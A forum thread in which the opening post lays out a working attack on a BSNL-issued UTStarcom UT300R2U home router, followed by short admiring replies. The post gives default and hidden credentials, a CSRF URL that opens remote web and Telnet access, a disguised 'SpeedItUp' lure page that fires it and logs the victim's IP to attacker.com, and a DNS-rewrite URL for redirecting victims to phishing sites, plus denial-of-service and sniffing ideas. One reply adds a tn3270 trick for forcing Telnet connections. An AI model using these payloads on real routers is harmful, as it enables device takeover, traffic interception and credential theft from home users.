Page 1 of 4 123 ... LastLast
Results 1 to 10 of 32

Thread: BSNL Home Routers - UTSTARCOM [UT300R2U] Share/Save - My123World.Com!

  1. #1

    Cool BSNL Home Routers - UTSTARCOM [UT300R2U]

    Hello Mates, This is my first post here

    Today im going to show you how a series of vulnerabilities in a web Application could be creatively exploited.

    Product Description:
    The product which i had my hands on is this UTSTARCOM router,

    It is one of the most common ADSL Modem cum Router which was rolled out by BSNL to their customers a year ago, when the number of internet subscribers was reaching the peak. This little devices runs a webserver which serves the web based router configuration application.Further it has a Telnet service running on it.

    The So Called BuiltIn Security Features :

    * Remote Web Access to the router is blocked by Default [so you can't access a victim's router by using his public IP]
    * Remote Telnet Access is also blocked

    After a little playaround with the device, i've found that there are 3 different users that can login into the router.
    viz admin,user,support

    The Documentation Provided by BSNL neither states that there are 3 different users that could access the device nor forces/asks/shows the users to change their default password for accessing the router [Note: Im not mentioning the PPoE Password]

    http://www.chennai.bsnl.co.in/BBS/UT300R2U.htm

    User Description:
    As the name suggests, admin user has the ablility to do all configuration changes to the router, whereas the user privileged user could not do any changes in the configuration of the router.

    Logged in as Admin:


    Logged in as User:


    Vulnerablility Description:

    On a closer examination of the source code,i got hold of a javascript menuBCM.js


    Code:
    menuBCM.js: 
      
      function menuAdmin(options) { // All the options are displayed for ADMIN
       var std = options[MENU_OPTION_STANDARD];
       var proto = options[MENU_OPTION_PROTOCOL];
       var firewall = options[MENU_OPTION_FIREWALL];
       var nat = options[MENU_OPTION_NAT];
       var ipExt = options[MENU_OPTION_IP_EXTENSION];
       var wireless = options[MENU_OPTION_WIRELESS];
       var voice = options[MENU_OPTION_VOICE];
       var snmp = options[MENU_OPTION_SNMP];
       var ddnsd = options[MENU_OPTION_DDNSD];
       var sntp = options[MENU_OPTION_SNTP];
    .
    .
    if ( user == 'admin' ) //this piece of code calls the respective menu to be displayed
          menuAdmin(options);
       else if ( user == 'support' )
          menuSupport(options);
       else if ( user == 'user' )
          menuUser();
    }
    -------------code truncated
    so it is pretty obvious from the code that the user privilege management is handled by this javacript by displaying all menu's to Admin and hides configuration menu's to the user.

    so it is possible to navigate to the configurations page by a user if he knows the URL

    The default username password combination is
    admin:admin
    user:user

    Since we know that the user privilege management is handled by a javascript, it has got nothing to do in a telnet session, so when we telnet as either a admin or as a user, we get full access [privilege] to the router.

    Further adding fuel to the fire, CSRF is present in the webbased configuration application

    Exploiting Methods:

    First and foremost point is we can't access the victim's router from WAN,

    As CSRF vulnerability is present on the router, this script will do the job

    Code:
    http://user:user@192.168.1.1/scsrvcntr.cmd?
    action=save&http=1&http=3&icmp=1&snmp=1&snmp=3&telnet=1&telnet=3&tftp=2&tftp
    =0
    Since there user:user account is some sort of hidden/undisclosed account, the possiblity of its default password being changed is very less.

    we could send this link to a victim either in a email or by some SE techniques, what this does is, it changes the router configuration and allows Remote Web access, Remote Telnet access on the router.

    The entire Exploit looks like this

    Code:
    index.html
    
    <html>
    <head>
    <title>SpeedItUp</title>
    </head>
    <body>
    <br><h1>This page configures your system to use high speed internet, please wait for
    few seconds for the script to configure</h1></br>
    Please click the button to continue.
    <iframe src ="config.html" width=70 marginwidth="25%" height=20
    scrolling="no" frameborder="0" class="iframe"></iframe>
    </body>
    </html>
    config.html

    Code:
    <html>
    <body onload="window.scrollTo(1440, 980);">
    <iframe src="http://user:user@192.168.1.1/scsrvcntr.cmd?
    action=save&http=1&http=3&icmp=1&snmp=1&snmp=3&telnet=1&telnet=3&tftp=2&tftp
    =0"
    width=3000 height=1000 frameborder=0></iframe>
    <iframe src="http://attacker.com/ip.php"
    width=3000 height=1000 frameborder=0></iframe>
    </body>
    </html>
    So after the user visits this page, we will have his IP in our database or somewhere depending upon the IP logger script.
    Now we can login into his router either by telnetting or by logging into the webapplication.

    Even though the victim changes the admin password for the device, we could log in as user:user and navigate into password.html page and viewing source --Kabboomm Plain text passwords in javascripts

    Code:
    Source code of password.html
    
    <script language="javascript"> 
    <!-- hide
     
       pwdAdmin = 'lame';  //Passwords   for all users are passed in plaintext for comparing
      pwdSupport = 'support';
      pwdUser = 'user';
      function btnApply() {
     var loc = 'password.cgi?';
     with ( document.forms[0] ) {
      var idx = userName.selectedIndex;
      
       switch ( idx ) {
             case 0:
                alert("No username is selected.");
                return;
             case 1:
                if ( pwdOld.value == pwdAdmin )
                   break;
                else {
                   alert("Old admin password is wrong.");
                   return;
                }
             case 2:
                if ( pwdOld.value ==     pwdSupport )
                   break;
                else {
                   alert("Old support password is wrong.");
            -------------------------- truncated
    So now we got admin access on both TELNET service and webservice, now here comes a variety of exploitation techniques


    Possible Attacks:

    1.Denial of Service:

    1.The attacker might implement MAC filtering or other IP restriction on the victimís router.
    2.Specifying a unreachable Static Route
    3.Killing the httpd server process of the router repeatedly by telneting into the victimís router.

    2.Sniffing:

    1.The attacker could specify a static route passing through his network for the victimís router and sniff the traffic from the victim. [SSL Strip + Ettercap + Wireshark]


    3.Phishing:

    This is the attack of our special interest as it is one of the stealthiest attack when combined with routing attacks.
    The attacker could specify a fake DNS server for the victim router and could carry out phishing attacks.
    Code:
    http://192.168.1.1/dnscfg.cgi?dnsPrimary=XX.XX.XX.XX&dnsSecondary=XX.XX.XX.XX&dnsDynamic=0&dnsRefresh=1
    XX.XX.XX.XX = Attackers DNS server

    This changes the primary & secondary DNS servers of the victimís router

    Now the victim's network is like this



    So we can specify our phishing sites IP address as A Records for famous websites like facebook,orkut,banking sites etc etc in our DNS server.



    You can download the whitepaper here
    Peace.. Similar vulnerablility is found in Nokia-Simens and many other Home Routers
    Fairly long post, isn't it ?
    Comments and Suggestions are Welcomed.

  2. #2
    Infosec Enthusiast AnArKI's Avatar
    Join Date
    Jul 2010
    Location
    London
    Posts
    514
    Blog Entries
    2
    Thts a impressive post

  3. #3
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    great post loved it, even i used to think wht was the possibility or extend a router/modem default password hack could lead to , well that DNS stuff is perfect one, faking the DNS server look for the kind of pages victim request for and make then build the DNS sever accordingly


    Pls post cools stuffs like this thanks
    Hacking Is a Matter of Time Knowledge and Patience

  4. #4
    Infosec Enthusiast AnArKI's Avatar
    Join Date
    Jul 2010
    Location
    London
    Posts
    514
    Blog Entries
    2
    perfect example of CSRF Cross Site request forgery....

  5. #5
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744
    Yeah that's a kewl attack scenario Boris.
    TFS your research.
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  6. #6
    nice read, thank you

  7. #7

    Also try this and do a little research

    tn3270://ipaddr


    Some research is needed in above protocol handler. it exists in the windows xp systems and attacker can force a victim to connect to a telnet connection to any arbitrary port.

    ..."vinnu"

  8. #8
    InfoSec Consultant the_empty's Avatar
    Join Date
    Jul 2010
    Location
    the blue no-where
    Posts
    155
    Blog Entries
    2
    awesome work boris.. TFS
    ACCESS is GOD

  9. #9

    Thumbs up

    Cool Find! Cheer!

  10. #10
    Great Research ...thanks
    The three great essentials to achieve anything worth while are: Hard work, Stick-to-itiveness, and Common sense. - Thomas A. Edison
    __________________________________________________ _____________________

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •